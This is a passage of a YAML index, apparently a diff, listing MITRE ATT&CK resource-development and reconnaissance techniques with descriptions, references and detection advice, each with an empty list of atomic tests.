launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. + + Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet) + id: attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-12T16:49:11.340Z' + created: '2020-10-01T00:48:09.578Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as during Command and Control. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1584.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1584.004 + url: https://attack.mitre.org/techniques/T1584/004 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Server + description: |- + Before compromising a victim, adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. + + Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). + id: attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-12T19:48:07.710Z' + created: '2020-10-01T00:56:25.135Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as during Command and Control. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1585.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1585.001 + url: https://attack.mitre.org/techniques/T1585/001 + - source_name: NEWSCASTER2014 + description: Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials + in Elaborate Social Media Attack Operation. Retrieved March 1, 2017. + url: https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation + - source_name: BlackHatRobinSage + description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved + March 6, 2017. + url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Social Media Accounts + description: "Before compromising a victim, adversaries may create and cultivate + social media accounts that can be used during targeting. Adversaries can create + social media accounts that can be used to build a persona to further operations. + Persona development consists of the development of public information, presence, + history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: + BlackHatRobinSage)\n\nFor operations incorporating social engineering, the + utilization of a persona on social media may be important. These personas + may be fictitious or impersonate real people. The persona may exist on a single + social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, + etc.). Establishing a persona on social media may require development of + additional documentation to make them seem real. This could include filling + out profile information, developing social networks, or incorporating photos. + \n\nOnce a persona has been developed an adversary can use it to create connections + to targets of interest. These connections may be direct or may include trying + to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) + These accounts may be leveraged during other phases of the adversary lifecycle, + such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003))." + id: attack-pattern--b1ccd744-3f78-4a0e-9bb2-2002057f7928 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-20T17:58:13.557Z' + created: '2020-10-01T01:08:41.124Z' + x_mitre_data_sources: + - Social media monitoring + x_mitre_detection: |- + Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1586.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1586.001 + url: https://attack.mitre.org/techniques/T1586/001 + - source_name: AnonHBGary + description: 'Bright, P. (2011, February 15). Anonymous speaks: the inside + story of the HBGary hack. Retrieved March 9, 2017.' + url: https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/ + - source_name: NEWSCASTER2014 + description: Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials + in Elaborate Social Media Attack Operation. Retrieved March 1, 2017. + url: https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation + - source_name: BlackHatRobinSage + description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved + March 6, 2017. + url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Social Media Accounts + description: "Before compromising a victim, adversaries may compromise social + media accounts that can be used during targeting. For operations incorporating + social engineering, the utilization of an online persona may be important. + Rather than creating and cultivating social media profiles (i.e. [Social Media + Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may + compromise existing social media accounts. Utilizing an existing persona may + engender a level of trust in a potential victim if they have a relationship, + or knowledge of, the compromised persona. \n\nA variety of methods exist for + compromising social media accounts, such as gathering credentials via [Phishing + for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials + from third-party sites, or by brute forcing credentials (ex: password reuse + from breach credential dumps).(Citation: AnonHBGary) Prior to compromising + social media accounts, adversaries may conduct Reconnaissance to inform decisions + about which accounts to compromise to further their operation.\n\nPersonas + may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, + Twitter, etc.). Compromised social media accounts may require additional development, + this could include filling out or modifying profile information, further developing + social networks, or incorporating photos.\n\nAdversaries can use a compromised + social media profile to create new, or hijack existing, connections to targets + of interest. These connections may be direct or may include trying to connect + through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised + profiles may be leveraged during other phases of the adversary lifecycle, + such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003))." + id: attack-pattern--274770e0-2612-4ccf-a678-ef8e7bad365d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-20T17:57:43.708Z' + created: '2020-10-01T01:18:35.535Z' + x_mitre_data_sources: + - Social media monitoring + x_mitre_detection: |- + Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1588.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1588.002 + url: https://attack.mitre.org/techniques/T1588/002 + - source_name: Recorded Future Beacon 2019 + url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/ + description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded + Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Tool + description: |- + Before compromising a victim, adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019) + + Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries). + id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-20T14:46:37.477Z' + created: '2020-10-01T02:08:33.977Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on post-compromise phases of the adversary lifecycle. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1583.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1583.003 + url: https://attack.mitre.org/techniques/T1583/003 + - source_name: TrendmicroHideoutsLease + description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: + Bulletproof Hosting Services. Retrieved March 6, 2017.' + url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Virtual Private Server + description: |- + Before compromising a victim, adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure. + + Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease) + id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-22T17:58:32.476Z' + created: '2020-10-01T00:44:23.935Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as during Command and Control. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1584.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1584.003 + url: https://attack.mitre.org/techniques/T1584/003 + - source_name: NSA NCSC Turla OilRig + url: https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf + description: 'NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla + Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October + 16, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Virtual Private Server + description: |- + Before compromising a victim, adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig) + + Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party. + id: attack-pattern--39cc9f64-cf74-4a48-a4d8-fe98c54a02e0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-22T18:01:45.792Z' + created: '2020-10-01T00:55:17.771Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as during Command and Control. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1588.006: + technique: + external_references: + - source_name: mitre-attack + external_id: T1588.006 + url: https://attack.mitre.org/techniques/T1588/006 + - source_name: National Vulnerability Database + url: https://nvd.nist.gov/ + description: National Vulnerability Database. (n.d.). National Vulnerability + Database. Retrieved October 15, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Vulnerabilities + description: |- + Before compromising a victim, adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database) + + An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)). + id: attack-pattern--2b5aa86b-a0df-4382-848d-30abea443327 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-16T01:54:39.868Z' + created: '2020-10-15T02:59:38.628Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on behaviors relating to the potential use of exploits + for vulnerabilities (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), + [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), + [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), + [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), + [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), + [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), + and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1583.006: + technique: + external_references: + - source_name: mitre-attack + external_id: T1583.006 + url: https://attack.mitre.org/techniques/T1583/006 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Web Services + description: Before compromising a victim, adversaries may register for web + services that can be used during targeting. A variety of popular websites + exist for adversaries to register for a web-based service that can be abused + during later stages of the adversary lifecycle, such as during Command and + Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration + Over Web Service](https://attack.mitre.org/techniques/T1567). Using common + services, such as those offered by Google or Twitter, makes it easier for + adversaries to hide in expected noise. By utilizing a web service, adversaries + can make it difficult to physically tie back operations to them. + id: attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-22T17:59:17.456Z' + created: '2020-10-01T00:50:29.936Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) + or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1584.006: + technique: + external_references: + - source_name: mitre-attack + external_id: T1584.006 + url: https://attack.mitre.org/techniques/T1584/006 + - source_name: Recorded Future Turla Infra 2020 + url: https://www.recordedfuture.com/turla-apt-infrastructure/ + description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail: + Tracking Turla Infrastructure. Retrieved October 20, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Web Services + description: 'Before compromising a victim, adversaries may compromise access + to third-party web services that can be used during targeting. A variety of + popular websites exist for legitimate users to register for web-based services, + such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take + ownership of a legitimate user''s access to a web service and use that web + service as infrastructure in support of cyber operations. Such web services + can be abused during later stages of the adversary lifecycle, such as during + Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) + or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: + Recorded Future Turla Infra 2020) Using common services, such as those offered + by Google or Twitter, makes it easier for adversaries to hide in expected + noise. By utilizing a web service, particularly when access is stolen from + legitimate users, adversaries can make it difficult to physically tie back + operations to them.' + id: attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-22T18:02:30.304Z' + created: '2020-10-01T01:01:00.176Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) + or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] +reconnaissance: + T1595: + technique: + id: attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b + description: |- + Before compromising a victim, adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction. + + Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). + name: Active Scanning + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1595 + url: https://attack.mitre.org/techniques/T1595 + - source_name: Botnet Scan + url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf + description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from + a Botnet. Retrieved October 20, 2020. + - source_name: OWASP Fingerprinting + url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting + description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved + October 20, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:06:50.402Z' + created: '2020-10-02T16:53:16.526Z' + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' + x_mitre_detection: |- + Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields. + + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_data_sources: + - Packet capture + - Network device logs + atomic_tests: [] + T1591.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1591.002 + url: https://attack.mitre.org/techniques/T1591/002 + - source_name: ThreatPost Broadvoice Leak + url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/ + description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, + Personal Voicemail Transcripts. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Business Relationships + description: |- + Before compromising a victim, adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources. + + Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). + id: attack-pattern--6ee2dc99-91ad-4534-a7d8-a649358c331f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:08:59.209Z' + created: '2020-10-02T16:27:55.713Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1596.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1596.004 + url: https://attack.mitre.org/techniques/T1596/004 + - source_name: DigitalShadows CDN + url: https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/ + description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery + Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What + You Can Do About It. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: CDNs + description: |- + Before compromising a victim, adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region. + + Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)). + id: attack-pattern--91177e6d-b616-4a03-ba4b-f3b32f7dda75 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:17:09.684Z' + created: '2020-10-02T16:59:56.648Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1592.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1592.004 + url: https://attack.mitre.org/techniques/T1592/004 + - source_name: ATT ScanBox + url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks + description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework + Used with Watering Hole Attacks. Retrieved October 19, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Client Configurations + description: |- + Before compromising a victim, adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone. + + Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). + id: attack-pattern--774ad5bb-2366-4c13-a8a9-65e50b292e7c + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T03:52:10.774Z' + created: '2020-10-02T16:47:16.719Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1589.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1589.001 + url: https://attack.mitre.org/techniques/T1589/001 + - source_name: ATT ScanBox + url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks + description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework + Used with Watering Hole Attacks. Retrieved October 19, 2020.' + - source_name: Register Deloitte + url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/ + description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck: + Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved + October 19, 2020.' + - source_name: Register Uber + url: https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/ + description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub + into court to find who hacked database of 50,000 drivers. Retrieved October + 19, 2020. + - source_name: Detectify Slack Tokens + url: https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/ + description: Detectify. (2016, April 28). Slack bot token leakage exposing + business critical information. Retrieved October 19, 2020. + - source_name: Forbes GitHub Creds + url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196 + description: Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud + Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved + October 19, 2020. + - source_name: GitHub truffleHog + url: https://github.com/dxa4481/truffleHog + description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October + 19, 2020. + - source_name: GitHub Gitrob + url: https://github.com/michenriksen/gitrob + description: 'Michael Henriksen. (2018, June 9). Gitrob: Putting the Open + Source in OSINT. Retrieved October 19, 2020.' + - source_name: CNET Leaks + url: https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/ + description: Ng, A. (2019, January 17). Massive breach leaks 773 million email + addresses, 21 million passwords. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Credentials + description: |- + Before compromising a victim, adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts. + + Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search 